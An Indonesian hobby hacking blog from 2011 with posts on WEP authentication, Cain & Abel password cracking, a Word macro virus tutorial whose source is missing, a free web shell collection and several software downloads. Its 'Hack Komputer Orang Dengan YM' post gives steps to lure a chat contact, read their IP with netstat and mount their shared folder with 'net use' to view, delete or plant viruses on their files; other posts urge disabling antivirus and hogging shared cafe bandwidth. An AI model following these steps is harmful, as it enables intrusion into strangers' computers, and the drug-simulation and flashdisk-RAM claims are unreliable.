Berbeda dengan Open System Authentication, Shared Key Authentication memaksa client untuk mengetahui terlebih dahulu kode rahasia/passphare sebelum mengijinkannya terkoneksi dengan AP. Idenya adalah mengurangi data sampah.
“Jika Anda tidak mengetahui WEP Key, toh akan sia-sia saja Anda saya ijinkan masuk jadi lebih baik saya cegah dulu di pintu depan”, demikian kira-kira pikir AP.



Pada proses Authentication ini, Shared Key akan “meminjam” WEP Key yang digunakan pada proses enkripsi WEP untuk melakukan pengecekan awal. Karena Shared Key Authentication “meminjam” key yang digunakan oleh level keamanan WEP, Anda harus mengaktifkan WEP untuk menggunakan Shared Key Authentication.
Untuk menghindari aksi sniffing, pengecekan WEP Key pada proses shared key authentication dilakukan dengan metode Challenge and Response sehingga tidak ada proses transfer password/WEP Key di dalam kabel (lihat box”Bagaimana Challenge dan Response Bekerja).

Bagaimana Chalienge dan Response Bekerja

Salah satu cara yang sangat disukai oleh hacker untuk mendapatkan username dan password adalah dengan mengintip di kabel jaringan. Username dan password yang dikirim melalui kabel sangat mudah untuk didapatkan tanpa perlu melakukan penyerangan secara langsung ke komputer korban.
Proses enkripsi terhadap password terbukti tidak efektif melawan aksi para hacker yang bisa melakukan proses dekripsi karena alasan kelemahan dari algoritma enkripsi selain itu masih banyak cara lain yang bisa digunakan oleh hacker. Untuk itu, para insinyur merancang suatu metode dimana password tidak lagi dikirim melalui kabel jaringan sehingga hasil yang di “intip” oleh hacker trunjadi tidak berguna.




Metode yang dinamakan Challenge and Response ini menggantikan pengiriman password dengan pertanyaan yang harus dijawab berdasarkan password yang diketahui. Prosesnya sebagai berikut:
  1. Client meminta i jin kepada server untuk melakukan koneksi
  2. Server akan mengirimkan sebuah string yang dibuat secara acak dan mengirimkannya kepada client. Server berkata kepada client”OK client, saya memberikan Anda sebuah string/nilai yang harus Anda enkripsikan dengan password Anda. Setelah dienkripsil an dengan password Anda, kirimkanlah jawabannya ke saya”
  3. Client akan melakukan enkripsi antara string/nilai yang diberikan oleh server dengan password yang diketahuinya. Hasil enkripsi ini kemudian dikirimkan kembali ke server
  4. Server akan melakukan proses dekripsi dan membandingkan hasilnya. Bila hasil dekripsi dari client menghasilkan string/nilai yang sama dengan string/nilai yang dikirimkan oleh server, berarti client mengetahui password yang benar.


TEKNIK HACKING MENJEBOL PASSWORD WEBSITE, EMAIL & JARINGAN LAINNYA MENGGUNAKAN PROGRAM CAIN & ABEL

Cain & Abel adalah pemulihan password utilitas yang dapat memudahkan untuk pemulihan  berbagai jenis password jaringan, cracking password terenkripsi menggunakan Dictionary, Brute-Force dan serangan Kriptoanalisis, rekaman percakapan VoIP, mebongkar decoding password, mengungkapkan kotak password, mengungkap password cache . dan menganalisis protokol routing  Ini mencakup beberapa aspek keamanan / hadir  juga kelemahan dalam standar protokol, metode otentikasi dan mekanisme caching, tujuan utamanya adalah pemulihan  password dan kredensial dari berbagai sumber, namun juga beberapa “non standard” utilitas untuk Microsoft pengguna Windows.
 Cain & Abel telah dikembangkan dengan harapan bahwa itu akan berguna bagi administrator jaringan, guru, konsultan keamanan / profesional, staf forensik, vendor keamanan perangkat lunak, penetration tester profesional dan orang lain yang berencana untuk menggunakannya untuk alasan etis. Penulis tidak akan membantu atau mendukung aktivitas ilegal dilakukan dengan program ini.
Jadi penulis  memperingatkan bahwa ada kemungkinan bahwa Anda akan menyebabkan kerusakan dan / atau kehilangan data menggunakan software ini dan apapun yang Anda lakukan penulis tidak bertanggung jawab atas kerusakan atau hilangnya data. Bacalah Perjanjian Lisensi termasuk dalam program sebelum menggunakannya. Versi terbaru lebih cepat dan berisi banyak fitur baru seperti ARP (Arp Poison Routing) yang memungkinkan sniffing di LAN diaktifkan dan melakukan serangan yang tersembunyi. Sniffer dalam versi ini juga dapat menganalisa protokol terenkripsi seperti SSH-1 dan HTTPS, dan berisi filter untuk menangkap mandat dari berbagai mekanisme otentikasi.
Versi baru ini juga memonitor protokol routing yang kapal otentikasi dan extractors rute dan brute force cracker untuk semua algoritma phising umum dan untuk otentikasi yang lebih  spesifik, password , serangan kriptanalisis, Decoder password dan beberapa utilitas tidak begitu umum yang terkait dengan jaringan dan sistem keamanan.
Catatan : Sebelum meng-Install program Cain & Abel ini sebaiknya Anda me-nonaktifkan program Anti Viursnya, karena Anti vurs akan menganggap program Cain & Abel ini adalah sebuah virus. . Hal ini disebut ‘positif palsu’. Yang positif palsu Istilah digunakan ketika perangkat lunak antivirus salah mengklasifikasikan file (ofensif) berbahaya sebagai virus. Deteksi yang salah mungkin karena heuristik atau ke virus signature tidak benar dalam database. [Masalah serupa dapat terjadi dengan antitrojan atau perangkat lunak antispyware.] Untuk menginstall program Cain & Abel sebaiknya Anda Disable Program Anti Viursnya!! Agar proses penginstalannya berjalan lacar dan program tidak dianggap virus positif palsu??? Oce bro...

Oklah sebelum memulai aksi ne...ini ane kasih program chain able dan article cara penggunaanya...
silahkan DOWNLOAD DISINI MASBRO
password RAR : boeimcyber

Semoga bermanfaat mass broo,, ^_^

CARA MEMBUAT VIRUS MACRO MENGGUNAKAN MICROSOFT WORD

 esemenehh x ne ane maw coba jadi virus maker masbroo..wkakwkwakw..
mana taw ntr bisa di cari orang untuk buat virus..hehehe..
oklah langsung aja ne massbroo..ane kasih tutornya langsung..
Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.
CARA MEMBUAT VIRUS MACRO
  1. Buka Ms.Word (hanya contoh)
  2. buka tools > Macro> Visual Basic Editor
Gambar 1. Langkah Menujur Macro Visual Basic Editor
3.  Akan muncul gambar di bawah
Gambar 2. Layout Macro Visual Basic Editor
4.  Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.
Gambar 3. Layout Source Code Virus Macro

Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???
Tenang, Penulis dah siapkan kok sourcenya. Makan neh source code!


 
SELAMAT MENCOBA MAS BROOOOOOOOOOOOOOOO!!!!

Kamis, 08 Desember 2011

mencari kelemahan website menggunakan Acunetix Web Vulnerability Scanner

keamaan web memang sangat penting untuk menjamin kelangsungan website kita agar tetap online dan banyak di kunjungi oleh orang lain, namun tidak menutup kemungkinan website anda akan di susupi hacker atau orang-orang iseng alias lamer yang hanya sekedar test ilmu atau memang bermaksud jahat dengan cara-cara dan tingkat kemampuan yang mereka miliki.
Nah itulah sebabnya keamanan website kita sangat penting di perhatikan agar terhindar dari serangan atau deface untuk kebaikan kita.
banyak cara yang dapat kita lakukan untuk audit website kita jika kita memang tidak punya basic ke ilmuan untuk mengamankan secara manual.

salah satunya dapat kita lakukan menggunakan software yang akan kita bahas pada session ini yaitu menggunakan acunetix Web Vulnerability Scanner.
software ini dapat kita coba offline maupun online, pada kesempatan kali ini kita akan coba pada posisi offline karena software ini sangat mudah di gunakan untuk kita yang awam dengan testing security web.

1. pertama anda dapat mendowload softwarenya DISINI
   Password Rar : boeimcyber
2. selanjutnya anda jalankan software acunetix ini kemudian klik File ==>> New

3. klik webscanner

4. Masukkan URL atau alamat web yang akan anda scan di kolom Start URL

5. Pilih paket profile yang ingin anda jalankan pada kolom profile, sebaiknya anda pilih default saja karena semua paket akan di jalankan
6. kemudian klik start di sebelah kanan kolom profile untuk menjalankan scanner.
7. saya coba testing scan website joomla dengan profile blind_injection di localhost saya dengan path http://www.localhost/joomlax/
berikut skrinsut hasilnya:

pada lingkaran bulat sebelah kiri menunjukkan hasil scan terhadap website joomla, sedangkan pada lingkaran sebelah kanan menunjukkan informasi scan dan tingkat vulnerability (kerapuhan) website yang di temukan hasil scan software ini.
8. pada testing blind_injection di temukan 2 notifikasi yang menyatakan ada bagian yang cukup berbahaya/vulnerable (lihat bagian lingkaran sebelah kiri) , anda tinggal arahkan kursor anda kebagian tersebut. secara otomatis di bagian sebelah kanan (lingkaran sebelah kanan) terdapat penjelasan deskripsi dari vulnerable itu dan cara menangani nya yang sudah di persiapkan oleh tim acunetix.
 Semoga Bermanfaat..
:)

Rabu, 07 Desember 2011

Hack Komputer Orang Dengan YM!

 pernah gak terpikir untuk masok ke data2 komputer orang,.?
gak pernah..? mati aja udah lo...wkwakawkakwkwa...
just kidding bro..namanya juga belajar2...
ok lahh kali ne ane share kan dikit pengalaman ane masok ke data komputer orang tanpa sepengetahuan dya..ahahahha
lanngsung aja ..
Langkah pertama..modal-nya kita harus tahu IP target yang ingin kita serang terlebih dahulu, dengan cara:

1. login YM
2. Ajak target untuk PM an
3. Paksa target terima file kamu..entah kirim apa kek..foto atau data apa aja (buat ngulur waktu)

kalau target sudah terpancing...lakukan Langkah kedua:

1.Klik start, lanjutkan dengan mengklik RUn
2. Ketik 'cmd' (tidak pakai tanda petik) akhiri dengan OK
3. Langkah selanjutnya, ketik : 'Netstat -an' (tidak pakai tanda petik) lanjutkan dengan OK
4. nanti akan muncul banyak keterangan di command prompt kamu...

lalu cari tanda 5050 <,sebelum tanda ini, tertulis angka beberapa digit...itulah IP target yg saat ini sedang menerima file pancingan dari kamu tadi.

Ip dah dapat...tinggal eksekusi nih: Halaman Command Promt jangan di tutup dulu.

Untuk eksekusi..neh dibutuhkan keberuntungan jika anda ingin mengintip file yang disimpan target di komputernya. Hehe...hehe...ketawa terus..awali dengan senyum yah..biar berhasil bro. Yo'i, kalau dah dapat...masih di halaman command promt kamu tadi:

1. ketik : ''net use: h \\ (Ip target)\shareddocs'' <

Kalau anda berhasil ..maka akan ada keterangan share docs succes..(Kalau sukses...silahkan anda buka drive anda di My Computer..maka akan ada tambahan drive baru..itu adalah drive dari komputer target. Karna anda telah terhubung dengan komputer target, jadi silahkan intip semua file yang tersimpan di komputernya..tentu semua tersedia dikomputer anda skrg...mau hapus..silahkan..mau nambah silahkan..mau nitip Virus..monggo...hehe.dah dikuasai kok..)

Catatan: Kalau keterangan error..maka sebenarnya target memasang security yang cukup,jadi silahkan pikirkan cara lain.


Keberuntungan adalah awal dari keberhasilan...iya kali? soalnya kalau gk beruntung..gmn mau sukses...hhehwhehe


Selamat mencoba deh.
semoga bermanfaat..

Aman kan Wordpress anda dengan hide admin page

okelah ane akan postingkan penemuan ane  tadi di mbah google,..
jalan2 kerumah mbah google..eh rupanya ada trik yang bagus ne..
ya ane curi aja lah..wakawkwakwakw
:)
langsung aja ke pokok pembahasannya..

Buka wp-login.php , trus coaps sourcenya ke notepad
replace semua kata “wp-login.php” (tanpa tanda kutip) dengan nama file yang “boeim.php” ..nama dapat terserah ya... replace semua script yang udah di ubah tadi ke wp-login php terus save

Next step, rename wp-login.php tadi dengan nama yang ente pilihkan tadi misalnya boeim.php .

kalo udah
coba cek ..http://webkamu.com/wp-admin pasti hasilnya 404 not found hahaha klo begitu kita udah berhasil...

akses panel admin ente dengan file login yang telah ente modif namanya sebelumnya ...

http://webkamu.com/boeim.php

coba login... berhasil bukan ?
sekarang coba logout ..
error ..
lalu cara untuk mengatasinya silahkan ente Buka folder “wp-admin” lalu buka admin-header.php, fine “wp_logout_url()” perhatikan source line di bawah ini


Code:
$links[15] = ‘| <a href=”‘ . wp_logout_url() . ‘” title=”‘ . __(‘Log Out’) . ‘”>’ . __(‘Log Out’) . ‘</a>’;

nah, ganti wp_logout_url() menjadi variable php seperti $kampret, ato $indonesia, ato terserah lo dah, kalo disini,
di sini kt bikin contoh nya $indonesia

nah diatas line terserbut kamu tambain dah,

Code:
$indonesia = wp_logout_url();

$indonesia = preg_replace(“/wp-login.php/”, “mct.php”, $indonesia);

sekarang coba kamu login..

heheh
sumber nya : fasthacker

Selasa, 06 Desember 2011

Cara memperbaiki flashdik yang rusak

Selamat pagi,siank,malamkawan2 cyber Semua..!!
waduhh...udah lama bah ane gak posting...
huhuhu...okok lah..kali ne si boeim pengen posting nee...tuh judulnya di atas...mungkin teman2 pernah ngalami kejadian flashdisk yang gak kebaca kan..? nah..contohnya ketika flashdisk di colokkan malah timbul please insert a disk. kayak ini penampakannya ..

jiaaahhhh....sempat bingung jugaa...hadehh...ane ngalamin tuh ..cari2 solusinya kesana kemari...ehh akhirnya nemu...makasih Mbah google...hahahha..

ok lah tanpa panjang lebar ,,waktu dan tempatnya saya persilahkan dengan segala hormat...wkakwakkawaw...kayak maw ceramah aja...ingat waktu upacara sekolah dolo jadinya..ahahaha
nah ini cara kerjanya ane kasih..
Cara kerja software :
  • Download softwarenya DISNI
  • Colokkan flashdisk
  • Jalankan software maka akan lansung mendeteksi device driver usb flashdisk
  • Selanjutnya klik Update.
  • Tunggu proses penggantian drivernya selesai dan flashdisk bisa digunakan kembali.
Password RAR : boeimcyber
Sangat mudah dan simple sekali khan. Semoga cara memperbaiki Flashdisk yang rusak diatas bisa membantu buat teman-teman semua yang mungkin mengalami kerusakan flashdisk.

Rabu, 30 November 2011

Software Untuk make Narkoba ( I-DOSER)

I-Doser adalah suatu aplikasi simulasi Brainwave (Gelombang Otak) yang dapat mempengaruhi suasana hati sesuai dengan doses (suatu file dosis dengan extensi *.drg yang akan dijalan aplikasi i-Doser). Idoser sangat baik dalam memberikan efek terhadap otak kita sehingga dapat mempengaruhi suasana hati, seperti mendapatkan kebahagian, efek penggunaan narkoba (Tetapi aman tanpa zat kimia, karena kita hanya mendengarkan suara gelombang yang telah dirancang) bahkan sampai efek orgasme. Jadi bila kita mendengarkan salah satu Dose dari I-Doser, misalnya 'Alkohol', maka akan terasa seperti Alkohol Sungguhan?!


Ada beberapa program yang memanipulasi brainwave ini, misalnya brainwave generator, dan tentu saja I-doser ini. Bedanya I-doser lebih mengkhususkan diri pada efek-efek obat-obatan tertentu sesuai nama dose-nya (dosis pada I-doser), misalnya : Marijuana, Hash, Opium, LSD, Ecstasy, Cocaine, Genesis sampai dengan Multy Orgasm.
Ada 4 jenis pengguna I-doser, yaitu pengguna yang:

  1. Kebal sama sekali ( tidak merasakan efek apapun )
  2. Kebal separuh ( merasakan tapi tidak maksimal, paling 50-60% )
  3. Tidak kebal ( merasakan sekali efeknya )
  4. Super sensitif ( mengalami efek-efek samping yang tidak sesuai dengan dosis )
Kalau kamu gagal merasakannya, berarti kamu masuk dalam kategori pertama atau kedua.
Apakah I-Doser ini berbahaya bagi tubuh kita??? I-Doser Labs menjamin hal itu dengan kondisi pada saat efek berlangsung jangan mengendarai kendaraan atau melakukan pekerjaan-pekerjaan dengan alat berat. Karena efek yang ditimbulkan berlangsung lumayan panjang, anda disarankan untuk mencari waktu senggang dan santai.
Tips Penggunaan I-Doser Yang Benar :

Metode dibawah ini adalah agar dose yang didengarkan memberikan efek yang maksimal (sesuai dengan efek dose yang didengarkan)

Peralatan yang diperlukan:
  • Program I-Doser dan 1 Dose (File I-Doser misalnya orgasm)
  • Headphone Stereo (Jangan menggunakan speakers)
  • Tempat tidur dan bantal yang Nyaman atau kursi Santai.

Hal Yang harus dilakukan:
  • Tutup Mata (Harus,, agar efek yang dirasakan lebih kuat).
  • Buat diri anda merasa Nyaman dan Santai

Langkah-langkah yang harus dilakukan agar efek yang dirasakan lebih kuat.

  1. Jauhkan semua gangguan, Pastikan anda tidak akan terganggu pada saat mendengarkan keseluruhan dose karena hal ini akan merusak efek dari dose yang anda dengarkan. Tutup semua program yang sedang dijalankan di komputer karena hal ini akan menimbulkan bunyi noise yang mungkin dapat menggagu anda. Anda harus bisa memastikan ini.
  2. Laksanakan dahulu apa yang harus dilakukan.Yakinkan semua keperluan anda harus dilakukan terlebih dahulu, misalnya, anda lapar maka anda harus makan dulu, atau ada pekerjaan-pekerjaan lain yang harus diselesaikan maka selesaikanlah, sehingga hal ini nantinya tidak akan menggaggu anda pada saat mendengarkan dose karena anda akan memusatkan perhatian hanya pada dose yang sedang anda dengarkan.
  3. Dengarkan Dose pada malam hari atau dalam gelap, Anda ingin efek dose 100% bekerja untuk anda??? Dengarkan dose pada malam hari atau dalam gelap. Matikan semua lampu, TV atau apapun yang menghasilkan cahaya atau suara-suara yang mengganggu.
  4. Tutup Mata, Dengan menutup mata pada saat mendengarkan Dose maka akan menguatkan efek Dose tersebut.
  5. Relax, Relax adalah salah satu terpenting yang harus kamu lakukan, karena pada saat relax akan memberikan efek yang kuat pada Dose yang sedang didengar.
  6. Fokus, adalah bagian terpenting untuk memberikan efek yang maksimal. Bersihkan pikiran anda dan hanya fokus pada beat sound yang sedang anda dengarkan.
  7. Tenang., Hilangkan kegelisaan pada saat mendengarkan dose dan Santai.
  8. Dengarkan Keseluruhan Dose,, Jangan Menghentikan Dose Dipertengahan!!! Dengarkan sampai Dose selesai diputar.
 Untuk download softwarenya klik DISINI
password rar : boimcyber

silahkan langgsung di coba...ane udah nyoba 100% work Gan..
whwhhwhwhwhahh

Cara Hacking Bandwidth Warnet

pernah saya Browsing Internet di warnet Browsingnya pelan sekali,..terus saya coba otak-atik dan cari sebabnya di mba "Google ternyata itu disebabkan karena tiap bilik atau room udah di batasi bitrate N bandwithnya di mikrotik warnetnya… nah sekarang ada Tips untuk mengatasi masalah tersebut caranya ikuti petunjuk dibawah ini :
1. Buka Browser Mozilla Firefox…
2. Pada Address Bar Ketik : ABOUT:CONFIG
3. Cari string di bawah ini : ( pastikan semua srting dibawah “TRUE”)
contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih “Toggle”
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE >INTEGER

5. Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
6. Kemudian REFRESH atau Tekan F5
7. Pada Address Bar Ketik : ABOUT:BLANK. Klik Menu:
-Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
-Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
-Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED
9. Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan :
10.Kemudian Tekan OK Lalu REFRESH ( F5 )
11.Masuk ke website ini https://addons.mozilla.org/en-US/firefox/addon/125?id=125&applicationfiltered=firefox
12.Download Software SwitchProxy Tool Versi 1.3.4
13.Setelah Selesai Jangan Tekan Tombol UPDATE
14.Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul
15.Tutup Semua Browser Mozilla FireFox,
16.Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4
Yang sudah di Install Tadi
17.Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi
dan Address Bar.
18. Sekarang Browser Mozilla Siap Untuk DiJalankan..

Sedikit Tambahan Saja :
— Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy
Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap
Kecepatan Koneksi Internet anda.
– Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk
Menyedot Bandwidth ( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang
Anda Pakai
– Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan “BROADBAND atu VSAT”
- OpenDNS. Daftarkan ke opendns.com, gratis juga.. so setting DNS TCP/IP.
- Tingkatkan bandith PC sampe 20%. Microsoft menggunakan 20% cadangan dari
bandwidth untuk update dan melaporkan kondisi computer dll,
ini cara menonaktifkan fungsi ini : Click Start–>Run–>ketik gpedit.msc —>ok
Selanjutnya ke –>Local Computer Policy–>Computer Configuration–>Administrative
Templates–>Network–>QOS Packet Scheduler–>Limit Reservable Bandwidth—->klik
2x Limit Reservable Bandwidth Disana tertulis is not configured tapi kenyataannya (baca
dibawah explain) “By default, the Packet Scheduler limits the system to 20 percent of the
bandwidth of a connection, but you can use this setting to override the default.”jadi
triknya adalah pilih enable kemudian di set ke 0 .Sehingga system tidak mempunyai
cadangan seperti kondisi default yang sampai 20%
Jika ingin lebih brutale lagi tambahkan addon FastererFox+cfosSpeed yang berguna
untuk mengkompres data yang masuk lewat koneksi dialup.
jangan Lupa comand sob" ^_^

Minggu, 27 November 2011

Tool Mencari shell/backdoor di website yang kena Deface

bagi kalian webmaster yang sudah pernah di susupi defacer dan pasti para defacer minitip shell di dalam nya atau istilahnya backdoor, supaya mereka susatu saat balex lagi dan bisa mengakses web tersebut, jika anda ingin menemukan shell yang di susupi hacker/defacer tersebut anda bisa mengcari nya dengan tool di bawah ini dan setelah anda menemukan nya dan bisa menghapus shell tersebut...
bagus nya sih site anda pindah server supaya lebih aman daripada defacer/hacker..

Anda bisa melihat banyak shell di dalam website tsb yang ada tanda quoute, salah satu nya
/home/greatblo/public_html/balblabla.com/wp-content/plugins/suspend/suspend.php
Source nya download dibawah ini :
Download Disini
Cara pemakaian nya tinggal upload dari cpnel anda source yg di atas dan akses letak nya dimana  :fas:

Koleksi Shell/Backdoor Gratisss

Buat yang suka Pepesan Silahkan di pilih apa kesukaan shell anda, dan klik di nama nya untuk mendownload nya...
List Shell :
 
 semoga bermanfaat ^_^

Selasa, 22 November 2011

Cara Upgrade Memory RAM Menggunakan Flashdisk


Akhirnya nemu juga solusi yang paling baik untuk mengupgrade RAM menggunakan jasa Flashdisk/MMC/M2/ dll.karena kapasitas memory RAM notebook gue dikit banget cuma 1GB,so..butuh di upgrade biar kinerja notebook gue lebih cepet dan lebih optimal.mengingat banyak software yang lumayan berat di install di notebook mungilku ini.semakin banyak software yang di install,semakin turun pula kinerja PC/Laptop/Notebook.
Well,cara mengupgrade memory RAM menggunakan Flashdisk itu sangat gampang kok.yap,dengan cara menggunakan tool bantu yang bernama Ebostr.dalam hal ini,gue menggunakan Ebostr Pro 4 build 554 biar lebih mantapp.Sedikit Penuturan dari situsnya yang berbahasa inggris yang udah gue translate ke bahasa indonesia.eeekekeekkee

eBoostr PRO v4.0 Build 544b Merupakan solusi alternative yang mirip dengan Vista’s ReadyBoost dan SuperFetch. eBoostr mampu menaikan kecepatan dan respon dari berbagai aplikasi hanya dengan menggunakan Flash Disk yang berperan sebagai penyedia RAM yang kosong ataupun cache memory pada PC. Jadi kita bisa memanfaatkan aplikasi ini untuk bekerja dengan aplikasi yang cukup berat memerlukan sumberdaya memori PC anda. Dengan penggunaan eBoostr anda tidak harus upgrade hardware komputer anda!
Software ini adalah salah satu software unik karena mampu mengubah fungsi flashdisk anda sebagai modul RAM. Jika PC anda termasuk PC ber-memory kecil anda bisa menggunakan flashdisk anda sebagai RAM tambahan
eBoostr merupakan pengembangan dari ReadyBoost dan SuperFetch yang ada di windows vista. Software ini dibuat untuk bisa meningkatkan kapasitas memory RAM pada windows XP. Software ini dilengkapi dengan fitur smart caching agar aplikasi dan file dapat bekerja lebih maksimal. eBoostr support dengan perangkat USB dan Non Removable Media Device seperti (CF, SD/SDHC, MMC, xD memory card yang lainnya) serta dapat menggunakan memory harddisk yang kosong untuk dialokasikan sebagai cache.
Ingat…! Perangkat USB hanya bisa berjalan cepat jika port USB pada komputer sudah versi 2.0, kalo menggunakan versi sebelumnya speednya lambat dan kecepatan prosesnya juga berkurang. Untuk penambahan perangkat USB bisa ditambah hingga 4 perangkat yang bisa dipakai untuk ruang cache sekaligus. Ukuran cache pada setiap perangkat bisa mencapai maksimal 4 GB, kalo memakai NTFS ukurannya tidak terbatas.
Fitur utama dari “eBoostr”:
Smart cache aplikasi yang sering Digunakan untuk file dan mempercepat kinerja maksimum;
Mendukung baik USB dan non-USB removable media Perangkat, serta tambahan hard disk;
Memungkinkan hingga 4 Perangkat caching untuk simultan cerdas;
Kompatibel dengan semua siap Perangkat ReadyBoost.
Begitu bunyinya gan.well,sekarang cara menggunakannya.

Langkah pertama ( Install )

1.Download dulu Apps nya Disini
2.Lakukan installasi seperti installasi software pada umumnya
3.Restart dulu PC kamu..
4.Letakkan Patchnya dan jalankan di folder C:/program files/ebostr
5.Selesai…
Langkahh kedua ( Penyettingan )
1.Colokkan USB Flash/MMC/M2/dll..
2.Klik Configurasi dan secara otomatis akan muncul USB flash kamu di menu eBostr

3.Klik icon dan pilih space yang inginkan.misalnya,kalau flashdisk kamu 4GB tinggal atur aja.berapa ruang yang kamu donorkan ke eBostr.lebih gede,lebih baik ( lebih cepet kompinya )
4.Klik Build dan tunggu beberapa detik sampai prosesnya selesai.
5.Rasakan kecepatan kompimu…

Gue puas sama aplikasi yang satu ini,karena udah membantu kinerja notebookku lebih optimal.itung-itung menghemat biaya dunk,ya bandingin aja harga RAM ma Flashdisk.jauh banget sob.oleh karena itu,gue saranin gunakan eBostr Pro 4.0 build 544b dan Rasakan manfaatnya.Ayo buruan …!!..mumpung masih gratis dan linknya masih aktif (ngga broken :-D ).
hehehheheh...semoga bermanfaat,
 
./BoeimCyber © 2011 Templates | Boeim